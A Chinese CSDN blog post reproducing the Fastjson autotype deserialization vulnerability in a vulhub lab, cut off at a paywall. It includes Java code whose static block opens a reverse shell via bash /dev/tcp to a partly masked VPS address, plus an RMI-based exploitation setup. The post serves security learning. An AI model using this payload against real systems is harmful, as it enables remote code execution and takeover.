Fastjson 反序列化漏洞复现

最新推荐文章于 2024-05-16 22:22:55 发布
最新推荐文章于 2024-05-16 22:22:55 发布
阅读量5.2k 收藏 10
点赞数 1
分类专栏: 渗透测试 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44677409/article/details/105504101
版权
Fastjson 反序列化漏洞复现前言因为之前并没有遇到过fastjson相关的漏洞,刚好这次有机会碰到了就顺便学习一下并记录自己踩过的坑。漏洞原理漏洞复现这里漏洞环境主要是用vulhub上的两个fastjson漏洞搭建,搭建完成以后访问8090端口会出现如下所示漏洞利用需要我们在vps上启一个RMI服务并调用class文件,这些我们都可以在一台服务器上完成。首先我们先创建命令执行...
摘要由CSDN通过智能技术生成

Fastjson 反序列化漏洞复现

前言

因为之前并没有遇到过fastjson相关的漏洞,刚好这次有机会碰到了就顺便学习一下并记录自己踩过的坑。

漏洞描述

fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题。

漏洞复现

这里漏洞环境主要是用vulhub上的两个fastjson漏洞搭建,搭建完成以后访问8090端口会出现如下所示
在这里插入图片描述
漏洞利用需要我们在vps上启一个RMI服务并调用class文件,这些我们都可以在一台服务器上完成。
首先我们先创建命令执行代码,执行命令反弹shell,创建test.java,使用命令javac test.java编译生成test.class(整个实验环境都是基于java8的基础上)

import java.lang.Runtime;
import java.lang.Process;

public class test {
   
    static {
   
        try {
   
            Runtime rt = Runtime.getRuntime();
            String[] commands = {
   "bash", "-c", "bash -i >& /dev/tcp/59.110.xx.xx/8002 0>&1"};
            Process pc = rt
最低0.47元/天 解锁文章
小白白@
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
二进制扫描的缓冲区溢出漏洞探测技术
09-08
缓冲区溢出漏洞自从出现以来,一直引起许多严重的安全性问题,而且随着软件系统越做越大,越来越复杂,缓冲区溢出漏洞的出现越来越普遍。本文从检测程序的漏洞方面着手,比较了以前常用的静态代码分析和实时错误注入的检测方法,提出了一种对可执行文件反汇编后的代码进行缓冲区溢出漏洞检测的技术, 提高了检测软件系统漏洞的效率。
Fastjson反序列化漏洞史1
08-03
然而,Fastjson在过去的几年里曾曝出一系列的反序列化漏洞,这些漏洞可能被攻击者利用,执行任意代码,从而对系统安全构成威胁。 在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的...
fastjson反序列化漏洞
qq_56426046的博客
11-20 6908
在这个示例程序中先是构造了⼀个恶意类,然后调⽤toJSONString⽅法序列化对象写⼊@type,将 @type指定为⼀个恶意的类TestTempletaHello的类全名,当调⽤parse⽅法对TestTempletaHello类进⾏ 反序列化时,会调⽤恶意类的构造⽅法创建实例对象,因此恶意类TestTempletaHello中的静态代码块中 就会被执⾏。fastjson在解析json的过程中,⽀持使⽤autoType来实例化某⼀个具体的类,并调⽤该类的set/get⽅法 来访问属性。
fastjson反序列化漏洞学习(一)
一剑开天门!的博客
02-10 3653
Fastjson 反序列化漏洞产生的原因通常是由于 Fastjson 库在反序列化 JSON 数据时存在安全漏洞。这些漏洞可以被攻击者利用来执行任意代码、访问系统文件、读取敏感数据等危险操作。
JsonExp!fastjson漏洞批量检测工具
最新发布
2401_84263282的博客
05-16 401
若出现dnslog回弹,可根据前面的编号去寻找对应的payload自1.4.0版本起,编号由7-9位的随机数字+字母组成编号.地址随机地址自1.4.0版本新增功能,参考自pocsuite3需挂全局代理才能访问并申请资源,使用此功能将对发包速度产生较大影响。若存在dnslog回弹结果,将会生成/result/xxx_dnslog.html文件,没触发dnslog则不会生成该文件。LDAP检测若为内网环境/目标无法DNS解析时,可使用工具在本地/云服务器起一个LDAP服务。
一次实战过程的漏洞挖掘复现
INK
11-09 3745
首先简单介绍一下百度语法: 把搜索范围限定在url链接中----inurl 例如:这里要查询管理界面或者相关链接:后台inurl:admin 把搜索范围限定在网站标题中----intitle 例如:这里要查询关于php intitle:php 吧搜索范围限定在特定站点中----site 例如:这里查询关于中科大 site:ustc.edu.cn 精确匹配使用"" 和《》 **1)使用方式:**在查询的词很长的情况下,百度所有结果可能把这个查询词拆分,导致搜索结果您并不满意。解决方案是可以给
linux漏洞挖掘nebula,Exploit-Exercises-Nebula
weixin_30830161的博客
05-16 246
这关给了一个Perl写的CGI程序,根据thttpd.conf的配置可知该CGI程序监听的1616端口。在虚拟机畅通的情况下直接通过http://192.168.56.101:1616/index.cgi 访问(192.168.56.101是我自己配置的IP地址,读者需要自己配置)。index.cgi的代码如下:#!/usr/bin/env perluse CGI qw{param};print ...
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列化和反序列化Java对象。当我们在处理日期时间字段时,可能会遇到反序列化时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
漏洞复现篇——利用vulhub模拟Weblogic的SSRF漏洞
爱国小白帽
01-15 3174
SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...
Java反序列化漏洞
MRS_jianai的博客
02-19 698
Java反序列化源码复现
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3035
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
网络安全深入学习第七课——热门框架漏洞(RCE— Fastjson反序列化漏洞
p36273的博客
09-18 1655
json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。"age":23,json本质就是一种字符串,用于信息的存储和交换。------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
【java安全】FastJson反序列化漏洞浅析
leekos的博客,分享web安全相关知识~
08-24 1578
前面我们学习了RMI和JNDI知识,接下来我们就可以来了解一下FastJson反序列化FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将JavaBean序列化为JSON字符串,也可以将JSON字符串反序列化到JavaBean。
java反序列化漏洞基础
02-22 610
近年来反序列化漏洞可谓被大家熟知,尤其是的在JAVA 程序中发现了大量的反序列化漏洞,这种漏洞危害极大,可以直接造成RCE,获取到权限,本人之前对于这个漏洞一致认识很浅薄,甚至对于利用方式和工具都不太清楚,本文是对java语言基础的序列化与反序列化进行学习。
Java代码审计——Fastjson1.2.60反序列化漏洞
王嘟嘟的博客
03-01 5660
0x00 前言 反序列化总纲 1.2.24可参考:1.2.24fastjson 1.2.25-1.2.41 可参考:1.2.25 1.2.25-1.2.42 可参考:1.2.42 1.2.43可参考1.2.43 1.2.60的利用方式,实际上就是绕过了fastjson的黑名单,前提还是要autotype开启,并且存在相对应的库。 0x01 环境 maven中加入以下,然后刷新即可。 <dependency> <groupId>commons-c
Fastjson反序列化漏洞复现
07-22
对不起,我无法提供有关Fastjson反序列化漏洞的具体复现方法。这种漏洞是一个安全问题,使用它可能会导致系统被攻击者利用。为了保护系统的安全,建议及时升级Fastjson版本或使用其他替代方案来解决这个问题。如果您...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值